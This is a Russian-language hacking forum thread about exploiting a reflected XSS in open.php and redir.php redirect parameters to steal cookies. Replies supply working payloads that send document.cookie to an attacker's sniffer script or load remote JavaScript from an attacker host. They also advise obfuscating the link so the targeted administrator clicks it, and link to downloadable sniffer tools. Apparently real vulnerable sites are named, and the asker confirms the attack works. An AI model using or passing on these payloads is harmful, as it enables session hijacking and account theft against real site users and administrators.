Здравствуйте. Вот нашёл на 1 сайте пассивную хсс ( /open.php?url='><script>alert(/xak/)</script> )

1 Вопрос, что можно сделать имея её? Возможно как-то украсть куки, и что-то вроде?

Заранее спасибо за ваши ответы.

Дать тому, у кого хочешь свистнуть куки, такую ссылку:

/open.php?url='<script>window.location.href='http://твой_сайт/s.php?'+document.cookie;</script>

где s.php - твой снифер

мда, почитай статьи по xss и вопросы пропадут сами собой, всё просто, любой поймёт

вот тебе мой снифер, может отправлять на почту, а может писать в файл. определяет некоторую инфу о юзере.
http://depositfiles.com/files/d3gf1m5m9

p.s. лучше написать свой ява скрипт, и залить на свой сервер с снифером, ссылка будет лучше
/open.php?url='<script src='http://www.blabla.ru/a.js'></script>

Просто видел у 1 человек нашёл пассивный хсс, и написал снифер вроде, и поставил его на хостинг, и когда заходиш на сайт http://тут его сайт.narod.ru то куки воруются у того сайта с пассивной хссшкой.

Здравствуйте. Вот нашёл на 1 сайте пассивную хсс ( /open.php?url='><script>alert(/xak/)</script> )

1 Вопрос, что можно сделать имея её? Возможно как-то украсть куки, и что-то вроде?

Заранее спасибо за ваши ответы.
Возможно при условии, что юзер (админ) окажется лохом и кликнет по ссылке, которую ты ему пришлешь. Только ссылку, которую тебе дал Pashkela запиши в hex или криптани, а то так палевно слишком.
Просто видел у 1 человек нашёл пассивный хсс, и написал снифер вроде, и поставил его на хостинг, и когда заходиш на сайт http://тут его сайт.narod.ru то куки воруются у того сайта с пассивной хссшкой.
Это либо активка была

Вот есть просто на сайте хсс пассивная вроде, http://freetmd.net/redir.php?url='><script>alert(/xak/)</script>

Как тут куки своровать?( Просто тестировал над собой, и куки не присылалисЬ, присылалась только инфа а куки нет.

Что значит "как"? Посты в теме читал вообще?

Pashkela, читал. Прочитай мой последний пост '' повнимательней '' пожалуйста.

"Просто тестировал над собой"

и что? Это должно мне о чем-то сказать? Например о том, что ты вообще понятие имеешь что такое снифер? И умеешь им ПРАВИЛЬНО пользоваться?

Вот правильный снифер, которым, например, пользуюсь давно уже:

Скачать снифер (http://pashkela.narod.ru/sniffer.rar)

Спасибо. Помог. Это типо нужно использовать так:

/open.php?url='<script src='http://мой сайт/снифер/s.gif'></script>

дык правильно?

http://www.mobile-warez.ru/redir.php?url='><script>alert(/xak/)</script>
Аналогичная хрень :)

BuG_4F, согласен) Просто учусь :) Вот и попросил помочь, если уж что кривое спросил вы меня простите :)

Спасибо. Помог. Это типо нужно использовать так:

/open.php?url='<script src='http://мой сайт/снифер/s.gif'></script>

дык правильно?

Нет, неправильно. Читай МОИ посты в этой теме. Остальные требуют уже некого понимания сути XSS и навыков

/open.php?url='<script>window.location.href='http://твой_сайт/s.gif?'+document.cookie;</script>

так значит?)

Маладес

Спасибо, работает. Тему плз клосед :) Если что найду интересное поделюсь в халяве :)